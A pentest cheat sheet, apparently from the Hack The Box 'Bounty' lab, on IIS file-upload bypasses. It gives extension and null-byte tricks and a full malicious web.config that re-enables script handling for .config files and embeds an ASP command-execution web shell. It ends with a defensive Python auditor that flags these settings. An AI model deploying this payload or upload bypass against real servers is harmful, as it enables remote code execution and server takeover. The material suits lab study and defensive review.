IIS Server File Upload
Developers can make directory-specific configurations on IIS servers using a web.config file.
<staticContent><mimeMap fileExtension=".json" mimeType="application/json" /></staticContent>
Web Config file
A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config
file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.
With a web.config file, you can control:
Database connection strings.
Error behavior.
Security.
web.config files are XML documents. .config is not an extension like .html or .txt.
Checklists
Try uploading a file with an .aspx or .asp extension.
If that doesn't work, tamper with the extension using .jpeg or .png.
Then try inserting a %00 (NULL byte) => shell.aspx%00.jpeg
Bounty HTB IIS File Upload
We could insert our aspx code at the end of our .config file.
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
  <appSettings>
  </appSettings>
</configuration>
<!-- Our actual aspx code starts from here -->
<!--
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("whoami") ' Executes shell commands
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-->
This is another way to trigger our exploit and get RCE.
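On the defensive side, the settings that make the config above dangerous can be checked mechanically before an uploaded .config file is accepted or during a review of a web root. The Python sketch below is an added example, not code from the original page; the function name `audit_web_config`, the finding labels and both sample documents are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

def audit_web_config(text):
    """Return sorted finding labels for the body of an uploaded .config file."""
    findings = set()
    if "<%" in text:  # ASP delimiters never belong in config, even in a comment
        findings.add("asp-script-block")
    if re.search(r"<!DOCTYPE", text, re.I):  # refuse DTDs before parsing
        return sorted(findings | {"doctype-present"})
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return sorted(findings | {"not-well-formed"})
    for handlers in root.iter("handlers"):
        policy = {p.strip() for p in handlers.get("accessPolicy", "").split(",")}
        if {"Script", "Write"} <= policy:
            findings.add("handlers-script-and-write")
        for add in handlers.iter("add"):
            if add.get("path", "").lower().endswith(".config"):
                findings.add("config-mapped-to-handler")
    for rm in root.iterfind(".//requestFiltering/fileExtensions/remove"):
        if rm.get("fileExtension", "").lower() == ".config":
            findings.add("config-extension-unblocked")
    for rm in root.iterfind(".//requestFiltering/hiddenSegments/remove"):
        if rm.get("segment", "").lower() == "web.config":
            findings.add("web.config-segment-unhidden")
    return sorted(findings)

# Constructed samples: the page's config with the script body omitted, and a benign one.
SAMPLE = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration><system.webServer>
  <handlers accessPolicy="Read, Script, Write">
    <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
         scriptProcessor="%windir%\system32\inetsrv\asp.dll" requireAccess="Write" />
  </handlers>
  <security><requestFiltering>
    <fileExtensions><remove fileExtension=".config" /></fileExtensions>
    <hiddenSegments><remove segment="web.config" /></hiddenSegments>
  </requestFiltering></security>
</system.webServer></configuration>
<!-- <% ' script body omitted in this constructed sample %> -->
"""
BENIGN = """<configuration><system.webServer><staticContent>
  <mimeMap fileExtension=".json" mimeType="application/json" />
</staticContent></system.webServer></configuration>"""
```

An empty result only means none of these specific patterns were found; an upload handler should still refuse `web.config` and other `.config` names outright rather than rely on content inspection.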